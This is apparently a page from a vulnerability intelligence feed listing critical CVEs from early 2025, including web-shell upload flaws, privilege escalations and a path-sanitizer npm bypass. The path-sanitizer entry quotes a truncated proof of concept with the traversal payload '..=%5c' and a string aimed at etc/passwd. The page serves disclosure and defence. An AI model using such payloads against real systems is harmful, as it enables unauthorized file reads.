CyberAlerts is shutting down on June 30th, 2025. Thank you for your support!

Threat and Vulnerability Intelligence Database

RSS Feed

Example Searches:

CVE-2024-56829

Description: Huang Yaoshi Pharmaceutical Management Software through 16.0 allows arbitrary file upload via a .asp filename in the fileName element of the UploadFile element in a SOAP request to /XSDService.asmx.

CVSS: CRITICAL (10.0)

EPSS Score: 0.04%

Source: CVE
January 3rd, 2025 (6 months ago)

CVE-2024-56249

Description: Unrestricted Upload of File with Dangerous Type vulnerability in Webdeclic WPMasterToolKit allows Upload a Web Shell to a Web Server.This issue affects WPMasterToolKit: from n/a through 1.13.1.

CVSS: CRITICAL (9.1)

EPSS Score: 0.04%

Source: CVE
January 3rd, 2025 (6 months ago)

CVE-2024-56198

Description: Summary This is a POC for a path-sanitizer npm package. The filters can be bypassed and can result in path traversal. Payload: ..=%5c can be used to bypass this on CLI (along with other candidates). Something similar would likely work on web apps as well. PoC Here's the code to test for the filter bypass: const sanitize = require("path-sanitizer") const path = require("path") const fs = require("fs") // Real scenario: function routeHandler(myPath) { // Lets just assume that the path was extracted from the request // We want to read a file in the C:\Users\user\Desktop\myApp\ directory // But the user should be able to access C:\Users\user\Desktop\ // So we need to sanitize the path const APP_DIR = "/var/hacker" const sanitized = path.join(APP_DIR, sanitize(myPath)) // Now we would usally read the file // But in this case we just gonna print the path // console.log(sanitized) return sanitized } function readFile(filePath) { const absolutePath = path.resolve(filePath) // Resolve to absolute path fs.readFile(absolutePath, "utf8", (err, data) => { if (err) { console.error(`Error reading the file: ${err.message}`) return } console.log(`Contents of the file ${filePath} :\n${data}`) }) } input_user_bypass = "..=%5c..=%5c..=%5c..=%5c..=%5c..=%5c..=%5ctmp/hacked.txt" // input_user_bypass = "..=%5c..=%5c..=%5c..=%5c..=%5c..=%5c..=%5cetc/passwd" input_user_payload = "../../../../../../../../tmp/hacked.txt" readFile(routeHandler...

CVSS: CRITICAL (9.3)

EPSS Score: 0.05%

Source: Github Advisory Database (NPM)
January 2nd, 2025 (6 months ago)

CVE-2024-56220

Description: Incorrect Privilege Assignment vulnerability in SSL Wireless SSL Wireless SMS Notification allows Privilege Escalation.This issue affects SSL Wireless SMS Notification: from n/a through 3.5.0.

CVSS: CRITICAL (9.8)

EPSS Score: 0.04%

Source: CVE
January 1st, 2025 (6 months ago)

CVE-2024-56205

Description: Incorrect Privilege Assignment vulnerability in AI Magic allows Privilege Escalation.This issue affects AI Magic: from n/a through 1.0.4.

CVSS: CRITICAL (9.8)

EPSS Score: 0.04%

Source: CVE
January 1st, 2025 (6 months ago)

CVE-2024-56198

Description: path-sanitizer is a simple lightweight npm package for sanitizing paths to prevent Path Traversal. Prior to 3.1.0, the filters can be bypassed using .=%5c which results in a path traversal. This vulnerability is fixed in 3.1.0.

CVSS: CRITICAL (9.3)

EPSS Score: 0.05%

Source: CVE
January 1st, 2025 (6 months ago)

CVE-2024-56071

Description: Incorrect Privilege Assignment vulnerability in Mike Leembruggen Simple Dashboard allows Privilege Escalation.This issue affects Simple Dashboard: from n/a through 2.0.

CVSS: CRITICAL (9.8)

EPSS Score: 0.04%

Source: CVE
January 1st, 2025 (6 months ago)

CVE-2024-56066

Description: Missing Authorization vulnerability in Inspry Agency Toolkit allows Privilege Escalation.This issue affects Agency Toolkit: from n/a through 1.0.23.

CVSS: CRITICAL (9.8)

EPSS Score: 0.04%

Source: CVE
January 1st, 2025 (6 months ago)

CVE-2024-56064

Description: Unrestricted Upload of File with Dangerous Type vulnerability in Azzaroco WP SuperBackup allows Upload a Web Shell to a Web Server.This issue affects WP SuperBackup: from n/a through 2.3.3.

CVSS: CRITICAL (10.0)

EPSS Score: 0.04%

Source: CVE
January 1st, 2025 (6 months ago)

CVE-2024-56046

Description: Unrestricted Upload of File with Dangerous Type vulnerability in VibeThemes WPLMS allows Upload a Web Shell to a Web Server.This issue affects WPLMS: from n/a through 1.9.9.

CVSS: CRITICAL (10.0)

EPSS Score: 0.04%

Source: CVE
January 1st, 2025 (6 months ago)